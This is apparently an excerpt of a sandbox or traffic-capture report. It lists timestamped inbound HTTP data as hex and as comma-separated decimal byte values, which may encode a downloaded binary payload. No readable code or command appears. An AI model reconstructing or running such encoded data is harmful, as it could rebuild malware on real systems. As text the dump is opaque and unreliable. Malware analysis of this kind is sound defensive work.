                                                                                                                                                                      Data Ascii: 163,190,227,26,187,157,128,38,125,30,78,29,118,228,83,135,65,62,117,152,199,167,14,81,62,117,56,4,167,14,77,56,116,48,54,136,227,131,106,189,21,231,14,198,223,132,87,213,191,137,163,7,227,187,194,155,172,231,195,135,191,187,135,15,183,58,135,15,122,146,79
                                                                                                                                                                      2022-01-14 11:21:11 UTC534INData Raw: 32 33 33 2c 32 31 32 2c 32 35 35 2c 31 36 35 2c 37 38 2c 31 36 37 2c 32 35 34 2c 31 31 39 2c 31 35 37 2c 32 33 38 2c 32 36 2c 39 38 2c 38 33 2c 31 38 32 2c 34 37 2c 32 35 35 2c 31 33 30 2c 31 31 36 2c 31 31 37 2c 37 36 2c 36 35 2c 32 34 36 2c 37 39 2c 31 39 31 2c 31 31 32 2c 32 34 35 2c 32 34 37 2c 31 33 39 2c 39 2c 32 32 36 2c 32 30 31 2c 32 30 30 2c 39 34 2c 32 34 35 2c 35 2c 36 33 2c 31 31 2c 31 32 32 2c 32 33 38 2c 32 33 2c 31 35 38 2c 39 37 2c 31 30 39 2c 31 30 39 2c 31 37 30 2c 32 32 38 2c 32 34 38 2c 31 30 37 2c 31 39 35 2c 33 33 2c 35 36 2c 32 30 36 2c 32 34 30 2c 31 30 32 2c 31 31 35 2c 32 31 37 2c 31 38 38 2c 32 30 35 2c 39 33 2c 38 34 2c 31 33 36 2c 32 30 37 2c 31 34 34 2c 32 30 35 2c 31 33 35 2c 31 35 37 2c 31 34 32 2c 31 38 34 2c 36 2c 32 31
                                                                                                                                                                      Data Ascii: 233,212,255,165,78,167,254,119,157,238,26,98,83,182,47,255,130,116,117,76,65,246,79,191,112,245,247,139,9,226,201,200,94,245,5,63,11,122,238,23,158,97,109,109,170,228,248,107,195,33,56,206,240,102,115,217,188,205,93,84,136,207,144,205,135,157,142,184,6,21
                                                                                                                                                                      2022-01-14 11:21:11 UTC550INData Raw: 31 38 34 2c 31 30 38 2c 31 37 33 2c 38 37 2c 37 36 2c 32 34 33 2c 39 2c 31 31 31 2c 36 32 2c 34 2c 31 30 30 2c 32 30 34 2c 31 30 39 2c 32 37 2c 32 32 39 2c 31 35 36 2c 34 34 2c 34 30 2c 39 37 2c 31 38 35 2c 32 32 33 2c 31 33 34 2c 31 38 39 2c 30 2c 36 30 2c 33 34 2c 38 32 2c 38 38 2c 31 2c 32 33 31 2c 36 38 2c 37 36 2c 36 39 2c 37 35 2c 31 37 32 2c 31 30 31 2c 32 31 34 2c 36 32 2c 31 38 38 2c 33 31 2c 31 30 33 2c 32 34 35 2c 39 30 2c 37 2c 31 33 37 2c 31 30 33 2c 36 39 2c 32 36 2c 32 34 33 2c 37 2c 31 38 33 2c 39 30 2c 31 33 35 2c 32 32 35 2c 38 35 2c 31 38 2c 32 33 35 2c 34 38 2c 32 33 35 2c 32 34 30 2c 31 35 32 2c 39 35 2c 31 35 35 2c 33 30 2c 31 31 2c 32 34 39 2c 32 31 31 2c 32 33 35 2c 38 37 2c 37 31 2c 35 35 2c 31 32 2c 39 36 2c 36 2c 32 30 31 2c 32
                                                                                                                                                                      Data Ascii: 184,108,173,87,76,243,9,111,62,4,100,204,109,27,229,156,44,40,97,185,223,134,189,0,60,34,82,88,1,231,68,76,69,75,172,101,214,62,188,31,103,245,90,7,137,103,69,26,243,7,183,90,135,225,85,18,235,48,235,240,152,95,155,30,11,249,211,235,87,71,55,12,96,6,201,2
                                                                                                                                                                      2022-01-14 11:21:11 UTC566INData Raw: 32 36 2c 31 34 39 2c 39 39 2c 32 32 32 2c 31 38 32 2c 32 30 38 2c 34 2c 32 30 34 2c 31 31 37 2c 31 36 2c 32 34 30 2c 34 38 2c 33 39 2c 38 31 2c 31 36 37 2c 32 32 35 2c 32 30 35 2c 33 37 2c 31 38 38 2c 30 2c 32 31 33 2c 32 32 30 2c 31 35 35 2c 31 39 37 2c 38 34 2c 31 33 32 2c 31 35 2c 37 38 2c 32 31 32 2c 32 32 37 2c 31 30 37 2c 33 33 2c 31 39 39 2c 31 38 35 2c 31 37 38 2c 32 38 2c 32 32 2c 32 33 30 2c 31 37 38 2c 31 37 31 2c 31 39 2c 32 2c 32 30 32 2c 31 32 2c 31 37 33 2c 31 36 36 2c 31 30 2c 31 31 38 2c 32 30 38 2c 31 37 31 2c 32 30 35 2c 31 31 31 2c 31 35 30 2c 31 31 37 2c 31 34 2c 37 31 2c 32 33 34 2c 33 35 2c 31 34 32 2c 32 30 38 2c 31 34 37 2c 32 34 34 2c 32 34 33 2c 32 34 35 2c 31 37 32 2c 31 38 34 2c 32 34 39 2c 38 30 2c 32 34 31 2c 31 36 33 2c 32
                                                                                                                                                                      Data Ascii: 26,149,99,222,182,208,4,204,117,16,240,48,39,81,167,225,205,37,188,0,213,220,155,197,84,132,15,78,212,227,107,33,199,185,178,28,22,230,178,171,19,2,202,12,173,166,10,118,208,171,205,111,150,117,14,71,234,35,142,208,147,244,243,245,172,184,249,80,241,163,2
                                                                                                                                                                      2022-01-14 11:21:11 UTC582INData Raw: 34 34 2c 35 35 2c 37 37 2c 32 30 31 2c 31 30 35 2c 35 37 2c 31 35 32 2c 31 36 36 2c 32 32 38 2c 31 38 34 2c 36 35 2c 37 34 2c 31 34 32 2c 31 32 2c 38 32 2c 31 37 38 2c 31 34 32 2c 36 35 2c 37 34 2c 31 35 36 2c 39 35 2c 33 36 2c 32 31 39 2c 34 37 2c 35 33 2c 32 34 2c 31 32 33 2c 32 32 31 2c 39 2c 35 33 2c 38 35 2c 31 31 2c 31 38 32 2c 33 2c 35 31 2c 31 33 31 2c 32 34 37 2c 32 31 39 2c 32 33 38 2c 31 36 38 2c 37 31 2c 31 38 34 2c 32 31 37 2c 32 34 2c 32 30 36 2c 36 32 2c 35 30 2c 31 35 35 2c 36 32 2c 35 34 2c 32 33 37 2c 31 39 31 2c 32 33 39 2c 34 31 2c 32 30 30 2c 37 37 2c 31 31 38 2c 32 30 33 2c 31 30 31 2c 32 33 31 2c 31 30 39 2c 31 35 30 2c 31 34 32 2c 34 2c 35 36 2c 31 38 34 2c 31 32 33 2c 32 30 34 2c 31 31 31 2c 31 38 2c 31 33 39 2c 32 34 31 2c 32 30
                                                                                                                                                                      Data Ascii: 44,55,77,201,105,57,152,166,228,184,65,74,142,12,82,178,142,65,74,156,95,36,219,47,53,24,123,221,9,53,85,11,182,3,51,131,247,219,238,168,71,184,217,24,206,62,50,155,62,54,237,191,239,41,200,77,118,203,101,231,109,150,142,4,56,184,123,204,111,18,139,241,20
                                                                                                                                                                      2022-01-14 11:21:11 UTC598INData Raw: 2c 32 34 32 2c 32 33 31 2c 35 38 2c 31 32 32 2c 31 31 36 2c 38 37 2c 31 38 35 2c 31 30 32 2c 33 34 2c 31 30 33 2c 32 33 36 2c 36 31 2c 39 37 2c 32 38 2c 39 35 2c 31 37 37 2c 32 35 35 2c 32 30 30 2c 31 38 32 2c 32 30 30 2c 32 35 2c 31 31 39 2c 31 35 30 2c 32 33 34 2c 32 34 38 2c 32 32 2c 31 38 33 2c 31 30 39 2c 39 34 2c 32 31 30 2c 31 37 34 2c 32 30 30 2c 32 35 2c 31 30 32 2c 32 33 35 2c 35 36 2c 35 34 2c 31 34 33 2c 32 32 33 2c 31 34 36 2c 31 32 33 2c 34 31 2c 31 31 34 2c 31 39 38 2c 31 39 38 2c 32 33 32 2c 35 36 2c 31 31 38 2c 34 33 2c 31 39 31 2c 31 34 39 2c 31 30 39 2c 31 34 35 2c 35 31 2c 37 38 2c 32 35 2c 31 35 2c 31 37 39 2c 31 32 34 2c 31 36 33 2c 31 30 38 2c 31 33 39 2c 31 35 36 2c 38 31 2c 37 33 2c 32 31 34 2c 31 38 31 2c 32 32 31 2c 32 30 33 2c
                                                                                                                                                                      Data Ascii: ,242,231,58,122,116,87,185,102,34,103,236,61,97,28,95,177,255,200,182,200,25,119,150,234,248,22,183,109,94,210,174,200,25,102,235,56,54,143,223,146,123,41,114,198,198,232,56,118,43,191,149,109,145,51,78,25,15,179,124,163,108,139,156,81,73,214,181,221,203,
                                                                                                                                                                      2022-01-14 11:21:11 UTC614INData Raw: 31 36 37 2c 37 38 2c 32 30 39 2c 31 36 39 2c 31 33 31 2c 34 2c 33 2c 32 33 36 2c 31 37 34 2c 31 39 32 2c 31 37 38 2c 32 37 2c 36 37 2c 32 34 32 2c 31 32 36 2c 31 32 2c 31 31 34 2c 35 33 2c 31 39 31 2c 38 31 2c 31 34 32 2c 32 32 35 2c 37 36 2c 38 36 2c 32 34 34 2c 31 35 37 2c 32 32 34 2c 35 32 2c 32 31 30 2c 32 34 39 2c 36 37 2c 31 36 31 2c 32 30 37 2c 31 39 31 2c 34 38 2c 31 36 37 2c 32 32 36 2c 36 30 2c 31 38 30 2c 31 37 32 2c 38 33 2c 37 39 2c 32 34 2c 32 34 32 2c 31 30 36 2c 34 38 2c 31 30 30 2c 31 37 38 2c 32 33 31 2c 31 39 34 2c 31 38 37 2c 32 33 38 2c 32 32 34 2c 38 34 2c 31 31 37 2c 32 35 30 2c 31 38 36 2c 32 35 34 2c 32 32 30 2c 32 33 33 2c 32 31 38 2c 32 32 39 2c 32 31 32 2c 36 37 2c 31 30 30 2c 31 34 34 2c 31 39 35 2c 31 31 37 2c 32 30 39 2c 31
                                                                                                                                                                      Data Ascii: 167,78,209,169,131,4,3,236,174,192,178,27,67,242,126,12,114,53,191,81,142,225,76,86,244,157,224,52,210,249,67,161,207,191,48,167,226,60,180,172,83,79,24,242,106,48,100,178,231,194,187,238,224,84,117,250,186,254,220,233,218,229,212,67,100,144,195,117,209,1
                                                                                                                                                                      2022-01-14 11:21:11 UTC620INData Raw: 32 34 31 2c 37 39 2c 33 39 2c 31 37 30 2c 31 33 32 2c 32 30 37 2c 31 36 33 2c 32 31 37 2c 35 38 2c 32 31 32 2c 32 35 31 2c 31 35 37 2c 38 38 2c 32 2c 32 32 32 2c 32 2c 35 37 2c 31 35 35 2c 31 33 33 2c 32 31 31 2c 32 31 2c 31 36 2c 31 31 38 2c 31 30 39 2c 31 38 32 2c 31 38 38 2c 34 31 2c 32 32 39 2c 32 34 36 2c 32 33 34 2c 31 35 39 2c 38 31 2c 31 37 30 2c 32 30 31 2c 38 32 2c 32 31 36 2c 31 31 34 2c 32 34 37 2c 31 34 36 2c 35 39 2c 36 31 2c 31 31 39 2c 32 35 34 2c 31 33 39 2c 32 30 32 2c 31 35 34 2c 33 32 2c 36 2c 31 33 38 2c 31 37 37 2c 31 33 32 2c 39 34 2c 31 30 39 2c 36 33 2c 31 38 32 2c 32 33 34 2c 32 31 2c 34 33 2c 30 2c 31 35 30 2c 31 36 33 2c 31 35 34 2c 31 39 31 2c 36 36 2c 31 32 30 2c 32 32 32 2c 31 30 36 2c 39 2c 37 34 2c 31 33 38 2c 32 34 2c 31
                                                                                                                                                                      Data Ascii: 241,79,39,170,132,207,163,217,58,212,251,157,88,2,222,2,57,155,133,211,21,16,118,109,182,188,41,229,246,234,159,81,170,201,82,216,114,247,146,59,61,119,254,139,202,154,32,6,138,177,132,94,109,63,182,234,21,43,0,150,163,154,191,66,120,222,106,9,74,138,24,1
                                                                                                                                                                      2022-01-14 11:21:11 UTC636INData Raw: 38 38 2c 37 35 2c 31 33 30 2c 31 38 39 2c 31 36 34 2c 31 32 30 2c 31 31 31 2c 34 39 2c 38 31 2c 36 30 2c 31 39 33 2c 32 30 33 2c 38 2c 35 33 2c 31 36 34 2c 31 39 31 2c 33 31 2c 32 35 32 2c 32 34 34 2c 32 34 34 2c 32 34 37 2c 31 38 37 2c 32 30 32 2c 31 36 37 2c 31 36 30 2c 31 39 31 2c 33 31 2c 32 34 34 2c 32 30 38 2c 32 32 33 2c 32 33 39 2c 34 32 2c 32 35 35 2c 31 39 2c 32 35 30 2c 32 35 31 2c 32 34 33 2c 38 36 2c 32 31 30 2c 37 34 2c 38 39 2c 31 35 34 2c 32 31 33 2c 38 36 2c 31 30 38 2c 36 31 2c 31 32 36 2c 31 31 33 2c 31 35 39 2c 31 30 36 2c 31 32 35 2c 39 36 2c 31 38 32 2c 31 33 31 2c 31 31 36 2c 32 34 38 2c 31 31 2c 31 36 32 2c 31 30 38 2c 38 30 2c 32 33 38 2c 34 35 2c 31 37 35 2c 31 34 30 2c 33 38 2c 33 32 2c 32 34 37 2c 38 39 2c 32 32 38 2c 31 34 30
                                                                                                                                                                      Data Ascii: 88,75,130,189,164,120,111,49,81,60,193,203,8,53,164,191,31,252,244,244,247,187,202,167,160,191,31,244,208,223,239,42,255,19,250,251,243,86,210,74,89,154,213,86,108,61,126,113,159,106,125,96,182,131,116,248,11,162,108,80,238,45,175,140,38,32,247,89,228,140
                                                                                                                                                                      2022-01-14 11:21:11 UTC652INData Raw: 35 36 2c 39 2c 33 38 2c 32 35 34 2c 31 39 2c 31 38 33 2c 32 31 35 2c 32 32 36 2c 34 32 2c 31 30 34 2c 32 30 35 2c 31 34 30 2c 36 36 2c 31 38 37 2c 38 38 2c 37 32 2c 31 39 34 2c 31 31 39 2c 31 35 31 2c 33 38 2c 31 39 32 2c 31 33 36 2c 38 33 2c 31 30 36 2c 31 32 36 2c 31 2c 32 30 34 2c 32 31 33 2c 32 30 36 2c 32 31 30 2c 34 2c 31 32 30 2c 31 30 2c 35 35 2c 31 31 2c 34 35 2c 31 31 35 2c 37 35 2c 38 30 2c 31 31 2c 32 32 39 2c 32 35 31 2c 31 32 38 2c 38 32 2c 32 33 35 2c 33 37 2c 37 34 2c 31 33 2c 34 2c 31 35 31 2c 31 30 37 2c 37 38 2c 32 30 34 2c 31 30 39 2c 32 33 32 2c 31 34 32 2c 38 35 2c 31 34 36 2c 31 36 37 2c 34 30 2c 35 37 2c 31 31 30 2c 36 37 2c 32 34 37 2c 31 34 30 2c 31 31 34 2c 32 35 35 2c 38 35 2c 31 32 39 2c 35 34 2c 36 33 2c 32 39 2c 31 30 31 2c
                                                                                                                                                                      Data Ascii: 56,9,38,254,19,183,215,226,42,104,205,140,66,187,88,72,194,119,151,38,192,136,83,106,126,1,204,213,206,210,4,120,10,55,11,45,115,75,80,11,229,251,128,82,235,37,74,13,4,151,107,78,204,109,232,142,85,146,167,40,57,110,67,247,140,114,255,85,129,54,63,29,101,
                                                                                                                                                                      2022-01-14 11:21:11 UTC668INData Raw: 2c 31 37 37 2c 32 34 2c 37 37 2c 32 33 31 2c 32 32 34 2c 32 37 2c 31 39 39 2c 31 32 36 2c 32 31 38 2c 31 35 31 2c 32 34 33 2c 31 34 38 2c 32 33 2c 32 30 33 2c 31 37 39 2c 31 37 36 2c 32 31 32 2c 31 31 39 2c 39 37 2c 31 33 33 2c 34 39 2c 38 38 2c 32 35 34 2c 36 2c 31 34 32 2c 34 37 2c 31 38 2c 31 39 39 2c 32 33 33 2c 35 36 2c 38 39 2c 32 32 31 2c 32 37 2c 31 33 31 2c 31 38 32 2c 31 36 33 2c 38 33 2c 32 30 2c 31 33 34 2c 31 34 39 2c 31 33 2c 31 31 36 2c 38 39 2c 31 33 30 2c 39 34 2c 31 37 39 2c 35 34 2c 34 38 2c 35 37 2c 38 35 2c 31 32 36 2c 37 36 2c 32 31 38 2c 36 31 2c 32 35 31 2c 31 37 32 2c 37 34 2c 31 35 38 2c 31 33 35 2c 32 30 38 2c 31 32 38 2c 31 33 32 2c 34 39 2c 31 38 36 2c 32 30 34 2c 34 30 2c 36 39 2c 39 30 2c 31 35 37 2c 32 30 38 2c 31 35 34 2c
                                                                                                                                                                      Data Ascii: ,177,24,77,231,224,27,199,126,218,151,243,148,23,203,179,176,212,119,97,133,49,88,254,6,142,47,18,199,233,56,89,221,27,131,182,163,83,20,134,149,13,116,89,130,94,179,54,48,57,85,126,76,218,61,251,172,74,158,135,208,128,132,49,186,204,40,69,90,157,208,154,
                                                                                                                                                                      2022-01-14 11:21:11 UTC684INData Raw: 2c 32 34 34 2c 31 30 38 2c 31 39 33 2c 31 39 35 2c 31 30 2c 32 32 36 2c 31 36 35 2c 39 32 2c 31 35 2c 31 35 36 2c 31 32 37 2c 32 34 2c 31 31 35 2c 32 31 38 2c 31 33 35 2c 31 34 36 2c 31 38 35 2c 31 36 30 2c 31 32 33 2c 34 34 2c 31 31 37 2c 36 2c 38 32 2c 31 32 33 2c 31 36 36 2c 32 35 31 2c 31 31 37 2c 31 34 35 2c 31 37 39 2c 31 34 36 2c 38 32 2c 35 30 2c 32 32 36 2c 31 38 30 2c 33 35 2c 31 31 38 2c 31 31 36 2c 31 38 30 2c 37 35 2c 31 37 39 2c 32 35 35 2c 36 37 2c 32 35 30 2c 35 33 2c 32 35 31 2c 39 39 2c 32 36 2c 31 35 35 2c 37 30 2c 31 36 39 2c 39 38 2c 31 30 38 2c 31 39 38 2c 31 37 36 2c 31 31 33 2c 39 30 2c 31 35 35 2c 31 33 38 2c 31 39 37 2c 31 35 31 2c 31 38 31 2c 31 39 35 2c 31 36 34 2c 31 31 35 2c 31 34 31 2c 38 31 2c 32 35 30 2c 38 31 2c 31 33 35
                                                                                                                                                                      Data Ascii: ,244,108,193,195,10,226,165,92,15,156,127,24,115,218,135,146,185,160,123,44,117,6,82,123,166,251,117,145,179,146,82,50,226,180,35,118,116,180,75,179,255,67,250,53,251,99,26,155,70,169,98,108,198,176,113,90,155,138,197,151,181,195,164,115,141,81,250,81,135
                                                                                                                                                                      2022-01-14 11:21:11 UTC700INData Raw: 2c 31 38 37 2c 31 30 34 2c 32 31 30 2c 31 35 35 2c 31 33 34 2c 31 35 2c 34 2c 34 2c 39 32 2c 36 37 2c 31 32 31 2c 33 36 2c 36 38 2c 32 33 32 2c 31 31 35 2c 34 2c 32 30 39 2c 32 31 35 2c 32 34 38 2c 35 38 2c 36 32 2c 31 35 2c 31 37 2c 31 34 35 2c 37 39 2c 37 39 2c 31 37 36 2c 32 32 35 2c 32 35 31 2c 31 31 34 2c 31 33 36 2c 31 37 34 2c 31 38 2c 38 35 2c 32 35 30 2c 32 32 30 2c 32 34 36 2c 34 39 2c 32 31 37 2c 37 36 2c 32 35 32 2c 31 38 31 2c 32 30 39 2c 31 39 35 2c 31 37 32 2c 31 38 33 2c 31 37 37 2c 32 31 37 2c 32 31 37 2c 32 33 2c 32 31 31 2c 32 32 30 2c 34 37 2c 33 34 2c 33 30 2c 31 34 39 2c 31 30 35 2c 31 31 33 2c 37 2c 31 34 35 2c 31 31 33 2c 33 33 2c 31 34 38 2c 32 34 35 2c 31 31 32 2c 31 38 32 2c 32 30 33 2c 31 30 30 2c 32 32 30 2c 32 32 31 2c 31 34
                                                                                                                                                                      Data Ascii: ,187,104,210,155,134,15,4,4,92,67,121,36,68,232,115,4,209,215,248,58,62,15,17,145,79,79,176,225,251,114,136,174,18,85,250,220,246,49,217,76,252,181,209,195,172,183,177,217,217,23,211,220,47,34,30,149,105,113,7,145,113,33,148,245,112,182,203,100,220,221,14
                                                                                                                                                                      2022-01-14 11:21:11 UTC716INData Raw: 2c 31 35 34 2c 31 37 36 2c 38 37 2c 38 37 2c 32 30 36 2c 31 38 36 2c 38 37 2c 31 39 36 2c 33 34 2c 33 38 2c 31 30 34 2c 31 38 31 2c 32 34 32 2c 32 33 37 2c 33 33 2c 32 30 37 2c 31 35 30 2c 32 34 37 2c 34 34 2c 35 32 2c 32 30 2c 31 36 31 2c 31 33 34 2c 31 34 31 2c 32 31 30 2c 35 31 2c 31 30 38 2c 38 31 2c 31 31 30 2c 31 31 37 2c 31 34 36 2c 39 34 2c 31 34 38 2c 32 32 33 2c 31 33 32 2c 31 38 33 2c 33 30 2c 36 37 2c 31 39 38 2c 32 30 2c 32 33 35 2c 37 37 2c 31 38 37 2c 34 31 2c 31 34 36 2c 35 39 2c 35 33 2c 32 32 37 2c 36 31 2c 31 39 35 2c 31 31 35 2c 31 33 33 2c 32 32 38 2c 38 30 2c 31 30 30 2c 36 35 2c 37 31 2c 38 34 2c 32 31 38 2c 34 35 2c 32 31 30 2c 31 32 31 2c 31 36 34 2c 31 35 30 2c 31 34 31 2c 31 31 33 2c 34 38 2c 31 35 38 2c 31 31 34 2c 31 39 39 2c
                                                                                                                                                                      Data Ascii: ,154,176,87,87,206,186,87,196,34,38,104,181,242,237,33,207,150,247,44,52,20,161,134,141,210,51,108,81,110,117,146,94,148,223,132,183,30,67,198,20,235,77,187,41,146,59,53,227,61,195,115,133,228,80,100,65,71,84,218,45,210,121,164,150,141,113,48,158,114,199,
                                                                                                                                                                      2022-01-14 11:21:11 UTC731INData Raw: 2c 33 39 2c 33 35 2c 31 32 30 2c 31 31 31 2c 31 33 2c 32 34 37 2c 31 31 37 2c 32 34 36 2c 35 31 2c 31 38 34 2c 32 30 36 2c 31 32 36 2c 36 2c 31 39 33 2c 30 2c 32 31 33 2c 32 34 31 2c 32 33 31 2c 33 30 2c 33 39 2c 31 39 31 2c 31 31 33 2c 38 30 2c 32 33 30 2c 31 30 34 2c 34 35 2c 32 32 32 2c 31 36 36 2c 36 33 2c 32 32 32 2c 33 31 2c 31 34 34 2c 32 32 33 2c 34 36 2c 34 30 2c 31 31 35 2c 36 39 2c 31 36 35 2c 32 33 39 2c 35 31 2c 32 32 38 2c 38 30 2c 31 34 35 2c 38 30 2c 31 39 32 2c 31 34 32 2c 31 35 2c 37 36 2c 31 38 36 2c 31 31 2c 31 39 36 2c 34 30 2c 31 37 38 2c 31 33 33 2c 31 35 33 2c 31 36 33 2c 31 31 36 2c 35 37 2c 32 33 35 2c 37 33 2c 31 39 35 2c 38 30 2c 31 36 2c 32 31 31 2c 32 33 38 2c 36 31 2c 31 31 36 2c 31 32 38 2c 31 30 35 2c 32 34 37 2c 37 38 2c
                                                                                                                                                                      Data Ascii: ,39,35,120,111,13,247,117,246,51,184,206,126,6,193,0,213,241,231,30,39,191,113,80,230,104,45,222,166,63,222,31,144,223,46,40,115,69,165,239,51,228,80,145,80,192,142,15,76,186,11,196,40,178,133,153,163,116,57,235,73,195,80,16,211,238,61,116,128,105,247,78,
                                                                                                                                                                      2022-01-14 11:21:11 UTC747INData Raw: 31 38 31 2c 31 39 33 2c 31 38 39 2c 35 39 2c 32 34 38 2c 31 30 35 2c 32 30 34 2c 37 38 2c 32 32 38 2c 31 31 31 2c 31 37 39 2c 32 35 34 2c 32 32 39 2c 31 39 39 2c 32 35 34 2c 32 31 38 2c 31 32 37 2c 32 34 36 2c 39 39 2c 31 35 2c 32 38 2c 32 34 38 2c 31 33 39 2c 33 33 2c 32 32 31 2c 31 39 37 2c 31 31 35 2c 33 33 2c 31 32 35 2c 31 39 36 2c 31 37 39 2c 31 37 33 2c 32 30 33 2c 32 30 33 2c 31 38 34 2c 32 2c 32 33 39 2c 31 37 32 2c 32 31 2c 31 33 34 2c 31 32 36 2c 32 34 37 2c 34 30 2c 31 36 39 2c 31 39 36 2c 31 30 36 2c 32 32 34 2c 33 2c 32 38 2c 37 36 2c 31 30 32 2c 31 39 33 2c 31 37 34 2c 32 34 38 2c 32 30 39 2c 31 32 36 2c 31 33 37 2c 32 37 2c 39 33 2c 32 34 31 2c 31 37 35 2c 35 38 2c 32 33 35 2c 31 33 35 2c 31 38 39 2c 31 31 34 2c 32 35 35 2c 32 32 37 2c 32
                                                                                                                                                                      Data Ascii: 181,193,189,59,248,105,204,78,228,111,179,254,229,199,254,218,127,246,99,15,28,248,139,33,221,197,115,33,125,196,179,173,203,203,184,2,239,172,21,134,126,247,40,169,196,106,224,3,28,76,102,193,174,248,209,126,137,27,93,241,175,58,235,135,189,114,255,227,2
                                                                                                                                                                      2022-01-14 11:21:11 UTC763INData Raw: 2c 31 34 37 2c 38 34 2c 31 37 31 2c 31 34 31 2c 38 30 2c 31 35 39 2c 31 33 30 2c 34 37 2c 31 33 33 2c 31 32 35 2c 31 31 38 2c 31 32 38 2c 35 38 2c 31 39 36 2c 32 31 36 2c 31 30 2c 31 38 34 2c 32 32 35 2c 31 34 39 2c 34 30 2c 38 30 2c 31 35 32 2c 32 31 39 2c 31 30 37 2c 31 35 31 2c 32 30 39 2c 36 35 2c 31 34 39 2c 31 34 30 2c 33 33 2c 38 35 2c 31 31 32 2c 37 2c 37 33 2c 33 35 2c 31 33 31 2c 31 32 38 2c 31 33 35 2c 31 37 35 2c 31 33 30 2c 35 30 2c 31 39 33 2c 38 37 2c 31 38 32 2c 32 31 2c 31 39 34 2c 31 34 36 2c 34 37 2c 31 37 2c 38 30 2c 32 33 31 2c 37 2c 31 30 2c 32 35 2c 31 30 37 2c 32 33 2c 31 30 2c 36 34 2c 32 31 35 2c 31 32 39 2c 33 38 2c 31 36 30 2c 32 31 36 2c 36 2c 31 31 37 2c 38 38 2c 32 34 38 2c 31 30 2c 31 36 31 2c 32 38 2c 31 32 2c 32 34 34 2c
                                                                                                                                                                      Data Ascii: ,147,84,171,141,80,159,130,47,133,125,118,128,58,196,216,10,184,225,149,40,80,152,219,107,151,209,65,149,140,33,85,112,7,73,35,131,128,135,175,130,50,193,87,182,21,194,146,47,17,80,231,7,10,25,107,23,10,64,215,129,38,160,216,6,117,88,248,10,161,28,12,244,
                                                                                                                                                                      2022-01-14 11:21:11 UTC779INData Raw: 2c 32 32 37 2c 31 37 37 2c 31 39 2c 31 35 38 2c 31 36 37 2c 33 2c 32 34 36 2c 31 30 37 2c 32 33 38 2c 39 2c 32 34 34 2c 35 36 2c 36 34 2c 32 30 35 2c 37 37 2c 33 33 2c 36 34 2c 31 33 31 2c 36 36 2c 32 31 39 2c 31 30 38 2c 31 36 33 2c 31 30 32 2c 31 30 32 2c 31 36 37 2c 35 35 2c 37 30 2c 38 31 2c 34 39 2c 32 34 31 2c 32 33 34 2c 32 31 37 2c 31 37 37 2c 38 2c 31 37 38 2c 31 31 34 2c 31 35 35 2c 32 33 37 2c 31 36 36 2c 32 31 35 2c 31 36 35 2c 31 38 33 2c 35 38 2c 31 32 33 2c 32 32 32 2c 38 30 2c 38 37 2c 32 33 33 2c 31 34 30 2c 31 38 2c 31 33 31 2c 31 35 32 2c 31 35 32 2c 31 37 30 2c 31 36 34 2c 31 35 36 2c 31 33 38 2c 32 33 2c 31 36 35 2c 31 37 32 2c 31 37 30 2c 31 38 30 2c 35 30 2c 36 35 2c 39 34 2c 39 30 2c 38 35 2c 37 33 2c 32 33 33 2c 31 36 30 2c 31 34
                                                                                                                                                                      Data Ascii: ,227,177,19,158,167,3,246,107,238,9,244,56,64,205,77,33,64,131,66,219,108,163,102,102,167,55,70,81,49,241,234,217,177,8,178,114,155,237,166,215,165,183,58,123,222,80,87,233,140,18,131,152,152,170,164,156,138,23,165,172,170,180,50,65,94,90,85,73,233,160,14
                                                                                                                                                                      2022-01-14 11:21:11 UTC795INData Raw: 32 32 39 2c 34 33 2c 38 33 2c 33 31 2c 35 38 2c 31 35 39 2c 36 31 2c 32 33 39 2c 31 31 30 2c 31 30 34 2c 32 35 35 2c 32 31 30 2c 35 36 2c 32 34 38 2c 31 31 37 2c 39 37 2c 39 36 2c 31 31 33 2c 32 33 32 2c 32 33 35 2c 32 30 37 2c 31 34 33 2c 32 32 31 2c 39 39 2c 39 39 2c 36 37 2c 39 35 2c 31 30 33 2c 31 39 31 2c 38 34 2c 31 31 39 2c 34 36 2c 37 38 2c 37 38 2c 34 34 2c 32 35 33 2c 38 39 2c 38 38 2c 32 35 30 2c 38 35 2c 32 31 30 2c 34 38 2c 32 34 38 2c 31 31 35 2c 33 36 2c 35 34 2c 33 33 2c 35 37 2c 33 34 2c 31 36 34 2c 32 34 34 2c 38 31 2c 32 33 34 2c 31 38 31 2c 37 35 2c 32 32 35 2c 32 31 35 2c 36 36 2c 32 32 36 2c 34 32 2c 32 35 31 2c 31 35 34 2c 39 34 2c 31 38 31 2c 36 30 2c 31 37 32 2c 31 37 32 2c 31 32 32 2c 32 31 33 2c 32 34 34 2c 31 38 30 2c 31 37 34
                                                                                                                                                                      Data Ascii: 229,43,83,31,58,159,61,239,110,104,255,210,56,248,117,97,96,113,232,235,207,143,221,99,99,67,95,103,191,84,119,46,78,78,44,253,89,88,250,85,210,48,248,115,36,54,33,57,34,164,244,81,234,181,75,225,215,66,226,42,251,154,94,181,60,172,172,122,213,244,180,174
                                                                                                                                                                      2022-01-14 11:21:11 UTC811INData Raw: 2c 31 34 38 2c 34 30 2c 31 31 39 2c 31 30 35 2c 31 38 31 2c 31 34 39 2c 31 36 32 2c 31 30 34 2c 31 30 35 2c 31 34 37 2c 38 32 2c 31 36 35 2c 31 38 30 2c 31 36 35 2c 31 36 35 2c 31 36 35 2c 38 35 2c 31 36 35 2c 32 31 32 2c 38 34 2c 31 30 36 2c 31 33 38 2c 31 36 32 2c 31 36 36 2c 32 34 37 2c 39 30 2c 32 32 33 2c 31 38 31 2c 36 36 2c 31 32 32 2c 32 32 33 2c 32 33 39 2c 32 34 33 2c 31 38 38 2c 32 35 31 2c 31 34 33 2c 31 38 33 2c 31 39 31 2c 32 32 33 2c 32 34 39 2c 31 30 30 2c 31 32 35 2c 32 34 36 2c 32 34 35 2c 32 32 31 2c 31 30 37 2c 31 37 33 2c 31 38 39 2c 32 34 37 2c 32 31 38 2c 32 35 31 2c 31 35 36 2c 31 31 32 2c 37 31 2c 31 36 38 2c 39 33 2c 31 30 39 2c 32 31 38 2c 31 31 30 2c 32 34 32 2c 31 30 30 2c 37 2c 31 33 36 2c 37 38 2c 32 33 36 2c 31 36 31 2c 31
                                                                                                                                                                      Data Ascii: ,148,40,119,105,181,149,162,104,105,147,82,165,180,165,165,165,85,165,212,84,106,138,162,166,247,90,223,181,66,122,223,239,243,188,251,143,183,191,223,249,100,125,246,245,221,107,173,189,247,218,251,156,112,71,168,93,109,218,110,242,100,7,136,78,236,161,1
